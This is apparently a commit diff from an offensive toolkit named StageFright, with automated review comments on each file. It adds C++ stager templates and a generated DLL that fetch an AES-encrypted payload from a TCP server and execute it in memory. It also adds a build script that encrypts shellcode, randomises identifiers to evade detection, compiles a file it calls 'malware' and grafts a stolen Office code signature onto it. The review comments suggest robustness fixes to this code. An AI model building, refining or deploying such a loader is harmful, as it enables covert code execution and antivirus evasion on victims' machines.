StageFright/StageFright/StageFright/TCP/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)
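Review bot: `bytes(bytearray(buf))` builds the same byte string twice; `bytes(buf)` is enough and raises the same `ValueError` for an element outside 0–255. Because `PAYVAL` is filled in by a `perl -pe` text substitution and then `sed`-edited in TCP.sh, an unexpected token in `shell5.txt` surfaces here as a `SyntaxError` with nothing pointing at the generator; a one-line comment such as `# PAYVAL is replaced by TCP.sh with the bracketed byte list printed by aesencrypt.py` would save the next reader the search.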

+ 69 - 0
StageFright/StageFright/StageFright/TCP/tcp_server.py

@@ -0,0 +1,69 @@
+import socketserver
+import os
+
+class MyHandler(socketserver.BaseRequestHandler):
+    def handle(self):
+        print("Connection received from:", self.client_address)
+
+        try:
+            # Receive file path length
+            path_len_bytes = self.request.recv(8)
+            if not path_len_bytes:
+                print("Error receiving file path length.")
+                return
+
+            path_len = int.from_bytes(path_len_bytes, byteorder='little')  # Change byte order to 'little'
+            print(f"Received file path length: {path_len}")
+
+            # Receive file path
+            file_path_bytes = b""
+            while len(file_path_bytes) < path_len:
+                received_data = self.request.recv(path_len - len(file_path_bytes))
+                if not received_data:
+                    print("Error receiving file path.")
+                    return
+                file_path_bytes += received_data
+
+            file_name = file_path_bytes.decode('utf-8')
+            print("Received file name:", file_name)
+
+            # Check if the file exists
+            file_path = os.path.join(os.getcwd(), file_name)
+            print("Absolute file path:", file_path)
+            if os.path.exists(file_path):
+                print("File found:", file_path)
+
+                # Read file data
+                with open(file_path, 'rb') as file:
+                    file_data = file.read()
+
+                # Print the size before sending
+                file_size = len(file_data)
+                print("Size of file:", file_size)
+
+                # Send file size to the client
+                self.request.sendall(file_size.to_bytes(4, byteorder='big'))
+
+                # Send file data back to the client
+                self.request.sendall(file_data)
+                print("File data sent successfully.")
+
+            else:
+                print("File not found:", file_path)
+                self.request.sendall(b"FILE_NOT_FOUND")
+
+        except Exception as e:
+            print("Error:", str(e))
+            self.request.sendall(b"SERVER_ERROR")
+
+if __name__ == "__main__":
+    host, port = "192.168.1.12", 8080
+    server = socketserver.TCPServer((host, port), MyHandler)
+    print(f"Server listening on {host}:{port}")
+
+    try:
+        server.serve_forever()
+    except KeyboardInterrupt:
+        print("Server shutting down.")
+        server.shutdown()
+
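Review bot: `os.path.join(os.getcwd(), file_name)` trusts a client-supplied name, so any host that can reach the listener can read files outside the serving directory: an absolute `file_name` discards the `getcwd()` prefix entirely under `os.path.join`, `../` segments walk up from it, and there is no authentication in front. Resolve and confine the path before opening it: `base = os.path.realpath(os.getcwd())` / `file_path = os.path.realpath(os.path.join(base, file_name))` / `if os.path.commonpath([base, file_path]) != base or not os.path.isfile(file_path):` then send `FILE_NOT_FOUND` and return (`isfile` also avoids the `IsADirectoryError` that `os.path.exists` lets through to `open()`). Two framing issues in the same handler: `self.request.recv(8)` may legitimately return fewer than 8 bytes, after which `int.from_bytes` yields a wrong length, and `path_len` has no upper bound before the receive loop, so one client can make the server accumulate an arbitrarily large `file_path_bytes`. The `FILE_NOT_FOUND`/`SERVER_ERROR` replies are also not in the 4-byte size-prefixed format the client side expects, so they are misread there as a length.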

+ 160 - 0
StageFright/StageFright/StageFright/TCP/template.cpp

@@ -0,0 +1,160 @@
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment (lib, "crypt32.lib")
+#pragma comment (lib, "advapi32")
+#include <psapi.h>
+
+// Define the shellcode function signature
+typedef void (*RandomA)();
+
+bool Random1(const char* Random2, int Random3, const char* Random4, char*& Random5, size_t& Random6) {
+    WSADATA wsaData;
+    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
+        return false;
+    }
+
+    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
+    if (clientSocket == INVALID_SOCKET) {
+        WSACleanup();
+        return false;
+    }
+
+    sockaddr_in serverAddress{};
+    serverAddress.sin_family = AF_INET;
+    serverAddress.sin_port = htons(Random3);
+    serverAddress.sin_addr.s_addr = inet_addr(Random2);
+
+    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    // Send the length of the file path first
+    size_t Random4Len = strlen(Random4);
+    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
+
+    // Send the file path to the server
+    send(clientSocket, Random4, Random4Len, 0);
+
+    int fileSize;
+    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
+    if (bytesRead != sizeof(fileSize)) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    fileSize = ntohl(fileSize);
+
+    // Receive and save the binary data in a dynamically allocated buffer
+    Random5 = new char[fileSize];
+    if (Random5 == nullptr) {
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    size_t totalSize = 0;
+    while (totalSize < fileSize) {
+        bytesRead = recv(clientSocket, Random5 + totalSize, fileSize - totalSize, 0);
+        if (bytesRead <= 0) {
+            delete[] Random5;
+            closesocket(clientSocket);
+            WSACleanup();
+            return false;
+        }
+        totalSize += bytesRead;
+    }
+
+    // Close the socket
+    closesocket(clientSocket);
+
+    Random6 = totalSize;
+
+    return true;
+}
+
+int Random7(char* Random8, unsigned int Random8_len, char* Random9, size_t Random9len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)Random9, (DWORD)Random9len, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random8, &Random8_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random9[] = KEYVALUE;
+
+int main() {
+    const char* Random2 = "HOSTNAME";  // Replace with the actual server IP
+    int Random3 = PORTY;               // Replace with the actual server port
+    const char* Random4 = "SHELLCODEFILE";  // Replace with the actual file path on the server
+
+    char* Random5;
+    size_t Random6;
+
+    if (Random1(Random2, Random3, Random4, Random5, Random6)) {
+        Random7((char*)Random5, Random6, Random9, sizeof(Random9));
+
+        // Allocate executable memory with READ, WRITE permissions
+        LPVOID executableMemory = VirtualAlloc(NULL, Random6, MEM_COMMIT, PAGE_READWRITE);
+        if (executableMemory == NULL) {
+            delete[] Random5;
+            return 1;
+        }
+
+        // Copy binary data to the executable memory
+        memcpy(executableMemory, Random5, Random6);
+
+        // Change the protection to PAGE_EXECUTE_READ
+        DWORD oldProtect;
+        if (!VirtualProtect(executableMemory, Random6, PAGE_EXECUTE_READ, &oldProtect)) {
+            VirtualFree(executableMemory, 0, MEM_RELEASE);
+            delete[] Random5;
+            return 1;
+        }
+
+        // Create a function pointer to the shellcode
+        RandomA RandomB = reinterpret_cast<RandomA>(executableMemory);
+
+        // Call the shellcode function
+        RandomB();
+    } else {
+        return 1;
+    }
+
+    return 0;
+}
+
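Review bot: `fileSize` is a signed `int` taken straight from the socket and used unchecked as the `new char[fileSize]` size and the loop bound in `Random1`: a negative value throws `std::bad_array_new_length` (the `nullptr` test after `new` is dead, since `new` throws rather than returning null), and the server's own `FILE_NOT_FOUND`/`SERVER_ERROR` replies are read as lengths of `0x46494C45`/`0x53455256`, i.e. a gigabyte-scale allocation followed by a hang waiting for bytes that never come. Bound it before allocating, e.g. `if (fileSize <= 0 || fileSize > kMaxPayload) { closesocket(clientSocket); WSACleanup(); return false; }` with a sensible `kMaxPayload` constant. In `main`, the return value of `Random7` (−1 when any `CryptAcquireContextW`/`CryptDeriveKey`/`CryptDecrypt` step fails) is discarded, so an undecrypted buffer is still copied and jumped to; check it with `if (Random7((char*)Random5, Random6, Random9, sizeof(Random9)) != 0) { delete[] Random5; return 1; }`. `Random7` also leaks `hProv`/`hHash` on each early `return -1`, the two `send()` results are never checked, and `Random5` is never freed on the success path.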

+ 26 - 0
StageFright/StageFright/StageFright/TCPDLL/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')
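Review bot: This is a byte-for-byte copy of `StageFright/TCP/Resources/aesencrypt.py` (and, per the diffstat, of the copies this commit adds under SMB, SMBDLL and StageFright/Resources), including the unused `from base64 import b64encode`. One shared script under `StageFright/Resources/` — the directory that already holds the shared SigThief copy — would keep the generators from drifting, with each `*.sh` pointing at that one path. The copy inherits the same exit-status problem: a missing or unreadable `sys.argv[1]` ends in `sys.exit()` with status 0, so TCPDLL.sh continues with an empty `shell.txt`; `sys.exit(1)` and `print(..., file=sys.stderr)` for the usage line fix that.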

+ 0 - 0
StageFright/StageFright/StageFright/TCPDLL/Resources/con.py


BIN
StageFright/StageFright/StageFright/TCPDLL/Resources/malware.dll


+ 188 - 0
StageFright/StageFright/StageFright/TCPDLL/Resources/template.cpp

@@ -0,0 +1,188 @@
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32")
+#include <psapi.h>
+
+// Define the shellcode function signature
+typedef void (*HUUTjodrPVG)();
+
+bool WXEjtHeXGRaH(const char* OQmbgsGuW, int yprPDCUUPq, const char* Random4, char*& GugJH, size_t& ENUQBQQ) {
+    WSADATA wsaData;
+    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
+        printf("Failed to initialize Winsock.\n");
+        return false;
+    }
+
+    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
+    if (clientSocket == INVALID_SOCKET) {
+        perror("Error creating socket");
+        WSACleanup();
+        return false;
+    }
+
+    sockaddr_in serverAddress{};
+    serverAddress.sin_family = AF_INET;
+    serverAddress.sin_port = htons(yprPDCUUPq);
+    serverAddress.sin_addr.s_addr = inet_addr(OQmbgsGuW);
+
+    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
+        perror("Invalid address/Address not supported");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
+        perror("Connection failed");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    // Send the length of the file path first
+    size_t Random4Len = strlen(Random4);
+    printf("Sending file path length: %zu\n", Random4Len);
+    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
+
+    // Send the file path to the server
+    printf("Sending file path: %s\n", Random4);
+    send(clientSocket, Random4, Random4Len, 0);
+
+    int fileSize;
+    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
+    if (bytesRead != sizeof(fileSize)) {
+        printf("Error receiving file size: %d\n", WSAGetLastError());
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
+
+    printf("Received file size: %d\n", fileSize);
+    // Receive and save the binary data in a dynamically allocated buffer
+    GugJH = new char[fileSize];
+    if (GugJH == nullptr) {
+        printf("Error allocating memory for binary data.\n");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    size_t totalSize = 0;
+    while (totalSize < fileSize) {
+        bytesRead = recv(clientSocket, GugJH + totalSize, fileSize - totalSize, 0);
+        if (bytesRead <= 0) {
+            printf("Error receiving binary data: %d\n", WSAGetLastError());
+            delete[] GugJH;
+            closesocket(clientSocket);
+            WSACleanup();
+            return false;
+        }
+        totalSize += bytesRead;
+    }
+
+    // Close the socket
+    closesocket(clientSocket);
+
+    ENUQBQQ = totalSize;
+    printf("Received data size: %zu\n", ENUQBQQ);
+
+    return true;
+}
+
+int kaRyEcluPiEW(char* gwtamZsHddxtV, unsigned int gwtamZsHddxtV_len, char* iNjzxZyJyK, size_t iNjzxZyJyKlen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)iNjzxZyJyK, (DWORD)iNjzxZyJyKlen, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, gwtamZsHddxtV, &gwtamZsHddxtV_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char iNjzxZyJyK[] =  { 0x59, 0xfa, 0xe2, 0x44, 0x6c, 0xf1, 0x9e, 0xf6, 0xdf, 0xd8, 0x4e, 0x16, 0xcd, 0xf5, 0x8a, 0xf6 };;
+
+extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    const char* OQmbgsGuW = "192.168.1.12";        // Replace with the actual server IP
+    int yprPDCUUPq = 8080;                     // Replace with the actual server port
+    const char* Random4 = "invoice.txt";   // Replace with the actual file path on the server
+
+    char* GugJH;
+    size_t ENUQBQQ;
+
+    if (WXEjtHeXGRaH(OQmbgsGuW, yprPDCUUPq, Random4, GugJH, ENUQBQQ)) {
+        printf("Binary data received successfully.\n");
+
+        // Print received data size for debugging
+        printf("Received data size: %zu\n", ENUQBQQ);
+
+        kaRyEcluPiEW((char*)GugJH, ENUQBQQ, iNjzxZyJyK, sizeof(iNjzxZyJyK));
+
+        // Allocate executable memory with READ, WRITE permissions
+        LPVOID executableMemory = VirtualAlloc(NULL, ENUQBQQ, MEM_COMMIT, PAGE_READWRITE);
+        if (executableMemory == NULL) {
+            DWORD error = GetLastError();
+            printf("Error allocating executable memory: %d\n", error);
+            delete[] GugJH;
+            return;
+        }
+
+        // Copy binary data to the executable memory
+        memcpy(executableMemory, GugJH, ENUQBQQ);
+
+        // Change the protection to PAGE_EXECUTE_READ
+        DWORD oldProtect;
+        if (!VirtualProtect(executableMemory, ENUQBQQ, PAGE_EXECUTE_READ, &oldProtect)) {
+            DWORD error = GetLastError();
+            printf("Error changing memory protection: %d\n", error);
+            VirtualFree(executableMemory, 0, MEM_RELEASE);
+            delete[] GugJH;
+            return;
+        }
+
+        // Create a function pointer to the shellcode
+        HUUTjodrPVG pCyhiFoGQ = reinterpret_cast<HUUTjodrPVG>(executableMemory);
+
+        // Call the shellcode function
+        printf("Executing shellcode...\n");
+        pCyhiFoGQ();
+
+        // No freeing of allocated memory in this POC
+
+        printf("Shellcode executed successfully.\n");
+
+        // Free allocated memory
+        delete[] GugJH;
+    } else {
+        printf("Failed to receive binary data.\n");
+        return;
+    }
+}
+
+
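Review bot: Like its TCP sibling, this file is the sed-expanded output that TCPDLL.sh regenerates from `TCPDLL/template.cpp` on every run (`cp StageFright/TCPDLL/template.cpp StageFright/TCPDLL/Resources/template.cpp` is the first step after the prompts), so the committed copy freezes one IP, one key and one `Go` entry-point name that the next run overwrites. Keeping it under version control invites edits that are silently lost; a `.gitignore` entry for `StageFright/*/Resources/template.cpp` (plus `Resources/con.py` and `Resources/malware.dll`) is the simpler fix. Note also the comment `// No freeing of allocated memory in this POC` followed three lines later by `delete[] GugJH;` — one of the two should go, and as it stands the comment is misleading.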

+ 175 - 0
StageFright/StageFright/StageFright/TCPDLL/TCPDLL.sh

@@ -0,0 +1,175 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+TCP DLL STAGER                        
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's The IP For Your TCP Server?"${clear}
+echo ""
+read HOSTIP
+echo ""
+echo -e ${green}"What Is The Port Your TCP Server Is Using?"${clear}
+echo ""
+read PORTY
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Entry Point Function"${clear}
+echo ""
+read ENTRYPOINT
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/TCPDLL/template.cpp StageFright/TCPDLL/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/TCPDLL/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/TCPDLL/conv.py StageFright/TCPDLL/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/TCPDLL/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/TCPDLL/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/TCPDLL/Resources/con.py
+sed -i "s/;//g" -i StageFright/TCPDLL/Resources/con.py
+python3 StageFright/TCPDLL/Resources/con.py
+#rm StageFright/TCPDLL/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/TCPDLL/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/ENTRYPOINT/$ENTRYPOINT/g" StageFright/TCPDLL/Resources/template.cpp
+sed -i "s/HOSTIP/$HOSTIP/g" StageFright/TCPDLL/Resources/template.cpp
+sed -i "s/PORTY/$PORTY/g" StageFright/TCPDLL/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/TCPDLL/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/TCPDLL/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/TCPDLL/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/TCPDLL/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random4=$(cat shell.txt)
+
+sed -i "s/Random3/$Random3/g" StageFright/TCPDLL/Resources/template.cpp
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/TCPDLL/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/TCPDLL/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/TCPDLL/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/TCPDLL/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/TCPDLL/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/TCPDLL/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/TCPDLL/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -shared -o $MALWARE StageFright/TCPDLL/Resources/template.cpp -lws2_32 -lntdll -static-libgcc -static-libstdc++ -Wl,--subsystem,windows -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""
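Review bot: Both the `x86_64-w64-mingw32-g++ -shared ...` compile and the `sigthief.py` run end in `>/dev/null 2>&1` and their exit status is never inspected, so when either fails the script still prints `***Malware Compiled***` and `***Signature Added. Happy Hunting!**`; the only visible symptom is an `mv: cannot stat` from the line after. Make the steps fail closed: `x86_64-w64-mingw32-g++ ... || { echo "compile failed" >&2; exit 1; }` and likewise for the signing step, or at least drop the redirects so the compiler's diagnostics reach the user. The `rm shell*` cleanup and the `fold -w ${1:-N}` constructs carry the same hazards as in TCP.sh — an unanchored glob over the caller's working directory (which removes a relative `shellcode.bin` input) and a dependence on the script's positional argument — and are fixed the same way with a `mktemp -d` scratch directory and literal widths. Separately, the `Random4` value generated at the second `#sPayloadSize` step is never applied (the `sed` that follows repeats the `Random3` substitution), which is dead code.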

+ 4 - 0
StageFright/StageFright/StageFright/TCPDLL/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)
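Review bot: `bytes(bytearray(buf))` on the second line wraps the value twice for no gain; `payload = bytes(buf)` produces the same object for any iterable of ints the substituted `PAYVAL` literal can be. The first line also carries trailing whitespace after `PAYVAL` that survives into the generated file. Since `PAYVAL` is substituted before this script runs, a one-line comment such as `# PAYVAL is replaced by the generator before this file is executed` would save the next reader from looking for the name.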

+ 188 - 0
StageFright/StageFright/StageFright/TCPDLL/template.cpp

@@ -0,0 +1,188 @@
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32")
+#include <psapi.h>
+
+// Define the shellcode function signature
+typedef void (*RandomA)();
+
+bool Random1(const char* Random2, int Random3, const char* Random4, char*& Random5, size_t& Random6) {
+    WSADATA wsaData;
+    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
+        printf("Failed to initialize Winsock.\n");
+        return false;
+    }
+
+    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
+    if (clientSocket == INVALID_SOCKET) {
+        perror("Error creating socket");
+        WSACleanup();
+        return false;
+    }
+
+    sockaddr_in serverAddress{};
+    serverAddress.sin_family = AF_INET;
+    serverAddress.sin_port = htons(Random3);
+    serverAddress.sin_addr.s_addr = inet_addr(Random2);
+
+    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
+        perror("Invalid address/Address not supported");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
+        perror("Connection failed");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    // Send the length of the file path first
+    size_t Random4Len = strlen(Random4);
+    printf("Sending file path length: %zu\n", Random4Len);
+    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
+
+    // Send the file path to the server
+    printf("Sending file path: %s\n", Random4);
+    send(clientSocket, Random4, Random4Len, 0);
+
+    int fileSize;
+    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
+    if (bytesRead != sizeof(fileSize)) {
+        printf("Error receiving file size: %d\n", WSAGetLastError());
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
+
+    printf("Received file size: %d\n", fileSize);
+    // Receive and save the binary data in a dynamically allocated buffer
+    Random5 = new char[fileSize];
+    if (Random5 == nullptr) {
+        printf("Error allocating memory for binary data.\n");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    size_t totalSize = 0;
+    while (totalSize < fileSize) {
+        bytesRead = recv(clientSocket, Random5 + totalSize, fileSize - totalSize, 0);
+        if (bytesRead <= 0) {
+            printf("Error receiving binary data: %d\n", WSAGetLastError());
+            delete[] Random5;
+            closesocket(clientSocket);
+            WSACleanup();
+            return false;
+        }
+        totalSize += bytesRead;
+    }
+
+    // Close the socket
+    closesocket(clientSocket);
+
+    Random6 = totalSize;
+    printf("Received data size: %zu\n", Random6);
+
+    return true;
+}
+
+int Random7(char* Random8, unsigned int Random8_len, char* Random9, size_t Random9len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)Random9, (DWORD)Random9len, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random8, &Random8_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random9[] = KEYVALUE;
+
+extern "C" void CALLBACK ENTRYPOINT(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    const char* Random2 = "HOSTIP";        // Replace with the actual server IP
+    int Random3 = PORTY;                     // Replace with the actual server port
+    const char* Random4 = "SHELLCODEFILE";   // Replace with the actual file path on the server
+
+    char* Random5;
